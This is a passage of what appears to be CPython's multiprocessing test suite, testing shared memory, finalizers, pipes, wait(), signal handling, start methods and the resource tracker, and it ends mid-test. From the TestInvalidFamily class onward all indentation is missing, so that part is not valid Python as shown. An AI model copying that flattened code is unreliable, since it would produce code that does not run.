        sl[0] = 'encodés'  # Exactly 8 bytes of UTF-8 data
        self.assertEqual(sl[0], 'encodés')
        self.assertEqual(sl[1], b'HoWdY')  # no spillage
        with self.assertRaisesRegex(ValueError,
                                    "exceeds available storage"):
            sl[0] = 'encodées'  # Exactly 9 bytes of UTF-8 data
        self.assertEqual(sl[1], b'HoWdY')
        with self.assertRaisesRegex(ValueError,
                                    "exceeds available storage"):
            sl[1] = b'123456789'
        self.assertEqual(sl[1], b'HoWdY')

        # Exercise count().
        with warnings.catch_warnings():
            # Suppress BytesWarning when comparing against b'HoWdY'.
            warnings.simplefilter('ignore')
            self.assertEqual(sl.count(42), 2)
            self.assertEqual(sl.count(b'HoWdY'), 1)
            self.assertEqual(sl.count(b'adios'), 0)

        # Exercise creating a duplicate.
        sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
        try:
            self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
            self.assertEqual('test03_duplicate', sl_copy.shm.name)
            self.assertEqual(list(sl), list(sl_copy))
            self.assertEqual(sl.format, sl_copy.format)
            sl_copy[-1] = 77
            self.assertEqual(sl_copy[-1], 77)
            self.assertNotEqual(sl[-1], 77)
            sl_copy.shm.close()
        finally:
            sl_copy.shm.unlink()

        # Obtain a second handle on the same ShareableList.
        sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
        self.assertEqual(sl.shm.name, sl_tethered.shm.name)
        sl_tethered[-1] = 880
        self.assertEqual(sl[-1], 880)
        sl_tethered.shm.close()
        sl.shm.close()

        # Exercise creating an empty ShareableList.
        empty_sl = shared_memory.ShareableList()
        try:
            self.assertEqual(len(empty_sl), 0)
            self.assertEqual(empty_sl.format, '')
            self.assertEqual(empty_sl.count('any'), 0)
            with self.assertRaises(ValueError):
                empty_sl.index(None)
            empty_sl.shm.close()
        finally:
            empty_sl.shm.unlink()

    def test_shared_memory_ShareableList_pickling(self):
        """Pickling a ShareableList transfers only the segment name, not
        the data, and the unpickled copy aliases the same memory."""
        sl = shared_memory.ShareableList(range(10))
        self.addCleanup(sl.shm.unlink)

        serialized_sl = pickle.dumps(sl)
        deserialized_sl = pickle.loads(serialized_sl)
        self.assertTrue(
            isinstance(deserialized_sl, shared_memory.ShareableList)
        )
        self.assertTrue(deserialized_sl[-1], 9)
        self.assertFalse(sl is deserialized_sl)
        # Writes through one handle are visible through the other.
        deserialized_sl[4] = "changed"
        self.assertEqual(sl[4], "changed")

        # Verify data is not being put into the pickled representation.
        name = 'a' * len(sl.shm.name)
        larger_sl = shared_memory.ShareableList(range(400))
        self.addCleanup(larger_sl.shm.unlink)
        serialized_larger_sl = pickle.dumps(larger_sl)
        self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
        larger_sl.shm.close()
        deserialized_sl.shm.close()
        sl.shm.close()

    def test_shared_memory_cleaned_after_process_termination(self):
        """A segment held only by an abruptly-killed process must be
        reclaimed by the resource tracker, with a warning on posix."""
        cmd = '''if 1:
            import os, time, sys
            from multiprocessing import shared_memory

            # Create a shared_memory segment, and send the segment name
            sm = shared_memory.SharedMemory(create=True, size=10)
            sys.stdout.write(sm.name + '\\n')
            sys.stdout.flush()
            time.sleep(100)
        '''
        with subprocess.Popen([sys.executable, '-E', '-c', cmd],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE) as p:
            name = p.stdout.readline().strip().decode()

            # killing abruptly processes holding reference to a shared memory
            # segment should not leak the given memory segment.
            p.terminate()
            p.wait()

            # Poll with exponential backoff until the tracker has cleaned up.
            deadline = time.monotonic() + support.LONG_TIMEOUT
            t = 0.1
            while time.monotonic() < deadline:
                time.sleep(t)
                t = min(t*2, 5)
                try:
                    smm = shared_memory.SharedMemory(name, create=False)
                except FileNotFoundError:
                    break
            else:
                raise AssertionError("A SharedMemory segment was leaked after"
                                     " a process was abruptly terminated.")

            if os.name == 'posix':
                # A warning was emitted by the subprocess' own
                # resource_tracker (on Windows, shared memory segments
                # are released automatically by the OS).
                err = p.stderr.read().decode()
                self.assertIn(
                    "resource_tracker: There appear to be 1 leaked "
                    "shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
    """Tests for util.Finalize callbacks and their ordering/thread-safety."""

    ALLOWED_TYPES = ('processes',)

    def setUp(self):
        # Run against an empty finalizer registry, restoring it afterwards.
        self.registry_backup = util._finalizer_registry.copy()
        util._finalizer_registry.clear()

    def tearDown(self):
        self.assertFalse(util._finalizer_registry)
        util._finalizer_registry.update(self.registry_backup)

    @classmethod
    def _test_finalize(cls, conn):
        """Child: register finalizers with various exit priorities and let
        _exit_function() fire them; each sends its tag over *conn*."""
        class Foo(object):
            pass

        a = Foo()
        util.Finalize(a, conn.send, args=('a',))
        del a  # triggers callback for a

        b = Foo()
        close_b = util.Finalize(b, conn.send, args=('b',))
        close_b()  # triggers callback for b
        close_b()  # does nothing because callback has already been called
        del b  # does nothing because callback has already been called

        # c has no exitpriority, so it is NOT run by _exit_function().
        c = Foo()
        util.Finalize(c, conn.send, args=('c',))

        d10 = Foo()
        util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)

        d01 = Foo()
        util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
        d02 = Foo()
        util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
        d03 = Foo()
        util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)

        util.Finalize(None, conn.send, args=('e',), exitpriority=-10)

        util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)

        # call multiprocessing's cleanup function then exit process without
        # garbage collecting locals
        util._exit_function()
        conn.close()
        os._exit(0)

    def test_finalize(self):
        """Finalizers fire in decreasing exitpriority order, LIFO within
        equal priorities."""
        conn, child_conn = self.Pipe()

        p = self.Process(target=self._test_finalize, args=(child_conn,))
        p.daemon = True
        p.start()
        p.join()

        result = [obj for obj in iter(conn.recv, 'STOP')]
        self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])

    def test_thread_safety(self):
        # bpo-24484: _run_finalizers() should be thread-safe
        def cb():
            pass

        class Foo(object):
            def __init__(self):
                self.ref = self  # create reference cycle
                # insert finalizer at random key
                util.Finalize(self, cb, exitpriority=random.randint(1, 100))

        finish = False
        exc = None

        def run_finalizers():
            nonlocal exc
            while not finish:
                time.sleep(random.random() * 1e-1)
                try:
                    # A GC run will eventually happen during this,
                    # collecting stale Foo's and mutating the registry
                    util._run_finalizers()
                except Exception as e:
                    exc = e

        def make_finalizers():
            nonlocal exc
            d = {}
            while not finish:
                try:
                    # Old Foo's get gradually replaced and later
                    # collected by the GC (because of the cyclic ref)
                    d[random.getrandbits(5)] = {Foo() for i in range(10)}
                except Exception as e:
                    exc = e
                    d.clear()

        old_interval = sys.getswitchinterval()
        old_threshold = gc.get_threshold()
        try:
            # Maximize thread interleaving and GC frequency to provoke races.
            sys.setswitchinterval(1e-6)
            gc.set_threshold(5, 5, 5)
            threads = [threading.Thread(target=run_finalizers),
                       threading.Thread(target=make_finalizers)]
            with test.support.start_threads(threads):
                time.sleep(4.0)  # Wait a bit to trigger race condition
            finish = True
            if exc is not None:
                raise exc
        finally:
            sys.setswitchinterval(old_interval)
            gc.set_threshold(*old_threshold)
            gc.collect()  # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
    """Test that ``from ... import *`` works for each multiprocessing
    submodule: every name in __all__ must actually exist."""

    def get_module_names(self):
        """Return the dotted names of all multiprocessing submodules,
        discovered from the package's .py files on disk."""
        import glob
        folder = os.path.dirname(multiprocessing.__file__)
        pattern = os.path.join(folder, '*.py')
        files = glob.glob(pattern)
        modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
        modules = ['multiprocessing.' + m for m in modules]
        modules.remove('multiprocessing.__init__')
        modules.append('multiprocessing')
        return modules

    def test_import(self):
        modules = self.get_module_names()
        # Drop the popen implementations that do not exist on this
        # platform (or without reduction / _ctypes support).
        if sys.platform == 'win32':
            modules.remove('multiprocessing.popen_fork')
            modules.remove('multiprocessing.popen_forkserver')
            modules.remove('multiprocessing.popen_spawn_posix')
        else:
            modules.remove('multiprocessing.popen_spawn_win32')
            if not HAS_REDUCTION:
                modules.remove('multiprocessing.popen_forkserver')

        if c_int is None:
            # This module requires _ctypes
            modules.remove('multiprocessing.sharedctypes')

        for name in modules:
            __import__(name)
            mod = sys.modules[name]
            self.assertTrue(hasattr(mod, '__all__'), name)

            for attr in mod.__all__:
                self.assertTrue(
                    hasattr(mod, attr),
                    '%r does not have attribute %r' % (mod, attr)
                )
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
    """Quick test that logging works -- does not test logging output."""

    ALLOWED_TYPES = ('processes',)

    def test_enable_logging(self):
        logger = multiprocessing.get_logger()
        logger.setLevel(util.SUBWARNING)
        self.assertTrue(logger is not None)
        logger.debug('this will not be printed')
        logger.info('nor will this')
        logger.setLevel(LOG_LEVEL)

    @classmethod
    def _test_level(cls, conn):
        """Child: report the effective level of the mp logger to *conn*."""
        logger = multiprocessing.get_logger()
        conn.send(logger.getEffectiveLevel())

    def test_level(self):
        """A child process inherits the multiprocessing logger's level,
        falling back to the root logger's level when unset."""
        LEVEL1 = 32
        LEVEL2 = 37

        logger = multiprocessing.get_logger()
        root_logger = logging.getLogger()
        root_level = root_logger.level

        reader, writer = multiprocessing.Pipe(duplex=False)

        # Explicit level on the multiprocessing logger propagates.
        logger.setLevel(LEVEL1)
        p = self.Process(target=self._test_level, args=(writer,))
        p.start()
        self.assertEqual(LEVEL1, reader.recv())
        p.join()
        p.close()

        # With NOTSET, the effective level comes from the root logger.
        logger.setLevel(logging.NOTSET)
        root_logger.setLevel(LEVEL2)
        p = self.Process(target=self._test_level, args=(writer,))
        p.start()
        self.assertEqual(LEVEL2, reader.recv())
        p.join()
        p.close()

        root_logger.setLevel(root_level)
        logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
    """Check that Process.join() retries if os.waitpid() fails with EINTR."""

    ALLOWED_TYPES = ('processes',)

    @classmethod
    def _killer(cls, pid):
        """Child: deliver SIGUSR1 to *pid* after a short delay, so the
        signal lands while the parent is blocked in join()."""
        time.sleep(0.1)
        os.kill(pid, signal.SIGUSR1)

    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
    def test_poll_eintr(self):
        got_signal = [False]
        def record(*args):
            got_signal[0] = True
        pid = os.getpid()
        oldhandler = signal.signal(signal.SIGUSR1, record)
        try:
            killer = self.Process(target=self._killer, args=(pid,))
            killer.start()
            try:
                p = self.Process(target=time.sleep, args=(2,))
                p.start()
                # join() must survive the SIGUSR1 delivered mid-wait.
                p.join()
            finally:
                killer.join()
            self.assertTrue(got_signal[0])
            self.assertEqual(p.exitcode, 0)
        finally:
            signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
    """Test to verify handle verification, see issue 3321."""

    @unittest.skipIf(WIN32, "skipped on Windows")
    def test_invalid_handles(self):
        # Wrap a bogus (almost certainly unused) fd in a Connection.
        conn = multiprocessing.connection.Connection(44977608)
        # check that poll() doesn't crash
        try:
            conn.poll()
        except (ValueError, OSError):
            pass
        finally:
            # Hack private attribute _handle to avoid printing an error
            # in conn.__del__
            conn._handle = None
        # A negative fd must be rejected outright at construction time.
        self.assertRaises((ValueError, OSError),
                          multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
    """Checks that the connection authentication handshake fails cleanly
    when a peer sends bogus challenge/response data.

    TODO: add more tests for deliver/answer challenge.
    """

    def test_deliver_challenge_auth_failure(self):
        """deliver_challenge() raises when the peer's digest is garbage."""
        class BogusConnection(object):
            def recv_bytes(self, size):
                # Answer every request with junk instead of a valid digest.
                return b'something bogus'

            def send_bytes(self, data):
                pass

        with self.assertRaises(multiprocessing.AuthenticationError):
            multiprocessing.connection.deliver_challenge(
                BogusConnection(), b'abc')

    def test_answer_challenge_auth_failure(self):
        """answer_challenge() raises when the server misbehaves after the
        initial CHALLENGE message."""
        class BogusConnection(object):
            def __init__(self):
                self.count = 0

            def recv_bytes(self, size):
                # First a bare CHALLENGE, then junk, then nothing.
                self.count += 1
                if self.count == 1:
                    return multiprocessing.connection.CHALLENGE
                if self.count == 2:
                    return b'something bogus'
                return b''

            def send_bytes(self, data):
                pass

        with self.assertRaises(multiprocessing.AuthenticationError):
            multiprocessing.connection.answer_challenge(
                BogusConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
    """Manager/Pool initializer (issue 5585): bump the shared namespace
    counter by one so tests can verify the initializer actually ran."""
    ns.test = ns.test + 1
class TestInitializers(unittest.TestCase):
    """Test Manager.start()/Pool.__init__() initializer feature -- issue 5585."""

    def setUp(self):
        self.mgr = multiprocessing.Manager()
        self.ns = self.mgr.Namespace()
        self.ns.test = 0

    def tearDown(self):
        self.mgr.shutdown()
        self.mgr.join()

    def test_manager_initializer(self):
        m = multiprocessing.managers.SyncManager()
        # A non-callable initializer must be rejected.
        self.assertRaises(TypeError, m.start, 1)
        m.start(initializer, (self.ns,))
        self.assertEqual(self.ns.test, 1)
        m.shutdown()
        m.join()

    def test_pool_initializer(self):
        # A non-callable initializer must be rejected.
        self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
        p = multiprocessing.Pool(1, initializer, (self.ns,))
        p.close()
        p.join()
        self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
    """Grandchild body: attempt one non-blocking get from *q*; an empty
    queue is expected and silently tolerated."""
    try:
        q.get(block=False)
    except pyqueue.Empty:
        pass
def _test_process():
    """Spawn a daemon child that pokes an (empty) queue, and wait for it.

    Used to verify queues work inside a child process (issues 5155/5313/5331).
    """
    q = multiprocessing.Queue()
    worker = multiprocessing.Process(target=_this_sub_process, args=(q,))
    worker.daemon = True
    worker.start()
    worker.join()
def _afunc(x):
    """Return the square of *x* (trivial work item for Pool.map tests)."""
    squared = x * x
    return squared
def pool_in_process():
    """Build a small Pool inside a child process and run a map over it.

    The mapped result is discarded; the test only cares that creating and
    using a Pool from within a child process completes without error.
    """
    pool = multiprocessing.Pool(processes=4)
    x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
    pool.close()
    pool.join()
class _file_like(object):
    """Minimal file-like object that buffers writes per process.

    The write cache is keyed on the current pid so that a forked child
    starts with a fresh, empty buffer instead of inheriting (and later
    re-flushing) the parent's cached writes.
    """

    def __init__(self, delegate):
        self._delegate = delegate
        self._pid = None  # pid that owns the current cache; None = no cache yet

    @property
    def cache(self):
        pid = os.getpid()
        # There are no race conditions since fork keeps only the running thread
        if pid != self._pid:
            self._pid = pid
            self._cache = []
        return self._cache

    def write(self, data):
        self.cache.append(data)

    def flush(self):
        # Push the buffered writes to the delegate and reset the buffer.
        self._delegate.write(''.join(self.cache))
        self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
    """Issues 5155, 5313, 5331: queues and pools created inside a child
    process must not fail because of stdin's file descriptor handling."""

    def test_queue_in_process(self):
        """A child process can create/drain its own queue-using child."""
        proc = multiprocessing.Process(target=_test_process)
        proc.start()
        proc.join()

    def test_pool_in_process(self):
        """A child process can create and use its own Pool."""
        p = multiprocessing.Process(target=pool_in_process)
        p.start()
        p.join()

    def test_flushing(self):
        """flush() must hand the cached writes to the delegate stream."""
        sio = io.StringIO()
        flike = _file_like(sio)
        flike.write('foo')
        # NOTE(review): `proc` is constructed but never started --
        # presumably vestigial; confirm before removing.
        proc = multiprocessing.Process(target=lambda: flike.flush())
        flike.flush()
        # Use a unittest assertion instead of a bare `assert`, which is
        # silently stripped when Python runs with -O.
        self.assertEqual(sio.getvalue(), 'foo')
class TestWait(unittest.TestCase):
    """Tests for multiprocessing.connection.wait() over pipes, sockets,
    process sentinels, and timeouts."""

    @classmethod
    def _child_test_wait(cls, w, slow):
        """Child: write ten (i, pid) tuples to *w*, optionally slowly."""
        for i in range(10):
            if slow:
                time.sleep(random.random()*0.1)
            w.send((i, os.getpid()))
        w.close()

    def test_wait(self, slow=False):
        from multiprocessing.connection import wait
        readers = []
        procs = []
        messages = []

        # Spawn four writers; the parent keeps only the read ends.
        for i in range(4):
            r, w = multiprocessing.Pipe(duplex=False)
            p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
            p.daemon = True
            p.start()
            w.close()
            readers.append(r)
            procs.append(p)
            self.addCleanup(p.join)

        # Drain every reader, dropping each one once it hits EOF.
        while readers:
            for r in wait(readers):
                try:
                    msg = r.recv()
                except EOFError:
                    readers.remove(r)
                    r.close()
                else:
                    messages.append(msg)

        messages.sort()
        expected = sorted((i, p.pid) for i in range(10) for p in procs)
        self.assertEqual(messages, expected)

    @classmethod
    def _child_test_wait_socket(cls, address, slow):
        """Child: connect to *address* and send ten numbered lines."""
        s = socket.socket()
        s.connect(address)
        for i in range(10):
            if slow:
                time.sleep(random.random()*0.1)
            s.sendall(('%s\n' % i).encode('ascii'))
        s.close()

    def test_wait_socket(self, slow=False):
        from multiprocessing.connection import wait
        l = socket.create_server((test.support.HOST, 0))
        addr = l.getsockname()
        readers = []
        procs = []
        dic = {}

        for i in range(4):
            p = multiprocessing.Process(target=self._child_test_wait_socket,
                                        args=(addr, slow))
            p.daemon = True
            p.start()
            procs.append(p)
            self.addCleanup(p.join)

        for i in range(4):
            r, _ = l.accept()
            readers.append(r)
            dic[r] = []
        l.close()

        # Drain each accepted socket; empty recv() means the peer closed.
        while readers:
            for r in wait(readers):
                msg = r.recv(32)
                if not msg:
                    readers.remove(r)
                    r.close()
                else:
                    dic[r].append(msg)

        expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
        for v in dic.values():
            self.assertEqual(b''.join(v), expected)

    def test_wait_slow(self):
        self.test_wait(True)

    def test_wait_socket_slow(self):
        self.test_wait_socket(True)

    def test_wait_timeout(self):
        """wait() returns [] roughly after the given timeout, and returns
        promptly once an object becomes ready."""
        from multiprocessing.connection import wait

        expected = 5
        a, b = multiprocessing.Pipe()

        start = time.monotonic()
        res = wait([a, b], expected)
        delta = time.monotonic() - start

        self.assertEqual(res, [])
        # Generous bounds: timing on loaded CI machines is imprecise.
        self.assertLess(delta, expected * 2)
        self.assertGreater(delta, expected * 0.5)

        b.send(None)

        start = time.monotonic()
        res = wait([a, b], 20)
        delta = time.monotonic() - start

        self.assertEqual(res, [a])
        self.assertLess(delta, 0.4)

    @classmethod
    def signal_and_sleep(cls, sem, period):
        """Child: release *sem* then stay alive for *period* seconds."""
        sem.release()
        time.sleep(period)

    def test_wait_integer(self):
        """wait() accepts a raw fd/handle (the process sentinel) mixed in
        with connection objects."""
        from multiprocessing.connection import wait

        expected = 3
        sorted_ = lambda l: sorted(l, key=lambda x: id(x))
        sem = multiprocessing.Semaphore(0)
        a, b = multiprocessing.Pipe()
        p = multiprocessing.Process(target=self.signal_and_sleep,
                                    args=(sem, expected))

        p.start()
        self.assertIsInstance(p.sentinel, int)
        self.assertTrue(sem.acquire(timeout=20))

        # Only the sentinel becomes ready, once the child exits.
        start = time.monotonic()
        res = wait([a, p.sentinel, b], expected + 20)
        delta = time.monotonic() - start

        self.assertEqual(res, [p.sentinel])
        self.assertLess(delta, expected + 2)
        self.assertGreater(delta, expected - 2)

        a.send(None)

        start = time.monotonic()
        res = wait([a, p.sentinel, b], 20)
        delta = time.monotonic() - start

        self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
        self.assertLess(delta, 0.4)

        b.send(None)

        start = time.monotonic()
        res = wait([a, p.sentinel, b], 20)
        delta = time.monotonic() - start

        self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
        self.assertLess(delta, 0.4)

        p.terminate()
        p.join()

    def test_neg_timeout(self):
        """A negative timeout is treated like zero: return immediately."""
        from multiprocessing.connection import wait
        a, b = multiprocessing.Pipe()
        t = time.monotonic()
        res = wait([a], timeout=-1)
        t = time.monotonic() - t
        self.assertEqual(res, [])
        self.assertLess(t, 1)
        a.close()
        b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
